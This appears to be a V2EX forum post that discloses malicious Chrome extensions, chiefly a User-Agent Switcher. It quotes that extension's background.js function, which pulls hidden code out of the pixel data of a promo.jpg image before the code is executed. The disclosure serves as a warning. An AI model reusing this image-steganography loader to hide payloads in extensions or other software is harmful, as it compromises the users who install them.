https://chrome.google.com/webstore/detail/user-agent-switcher-for-g/ffhkkpnppgnfaobgihpdblnhmmbodake
background.js 的第 80 行,从这个图片里解密出恶意代码并执行
t.prototype.Vh = function(t, e) {
if ("" === '../promo.jpg') return "";
void 0 === t && (t = '../promo.jpg'), t.length && (t = r.Wk(t)), e = e || {};
var n = this.ET,
i = e.mp || n.mp,
o = e.Tv || n.Tv,
h = e.At || n.At,
a = r.Yb(Math.pow(2, i)),
f = (e.WC || n.WC, e.TY || n.TY),
u = document.createElement("canvas"),
p = u.getContext("2d");
if (u.style.display = "none", u.width = e.width || t.width, u.height = e.width || t.height, 0 === u.width || 0 === u.height) return "";
e.height && e.width ? p.drawImage(t, 0, 0, e.width, e.height) : p.drawImage(t, 0, 0);
var c = p.getImageData(0, 0, u.width, u.height),
d = c.data,
g = [];
if (c.data.every(function(t) {
return 0 === t
})) return "";
var m, s;
if (1 === o)
for (m = 3, s = !1; !s && m < d.length && !s; m += 4) s = f(d, m, o), s || g.push(d[m] - (255 - a + 1));
var v = "",
w = 0,
y = 0,
l = Math.pow(2, h) - 1;
for (m = 0; m < g.length; m += 1) w += g[m] << y, y += i, y >= h && (v += String.fromCharCode(w & l), y %= h, w = g[m] >> i - y);
return v.length < 13 ? "" : (0 !== w && (v += String.fromCharCode(w & l)), v)
}
https://chrome.google.com/webstore/detail/nenhancer/ijanohecbcpdgnpiabdfehfjgcapepbm
https://chrome.google.com/webstore/detail/allow-copy/abidndjnodakeaicodfpgcnlkpppapah
https://chrome.google.com/webstore/detail/aliexpress-radar/pfjibkklgpfcfdlhijfglamdnkjnpdeg
这里也有人讨论这个问题 https://news.ycombinator.com/item?id=14889619
这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。
V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。
V2EX is a community of developers, designers and creative people.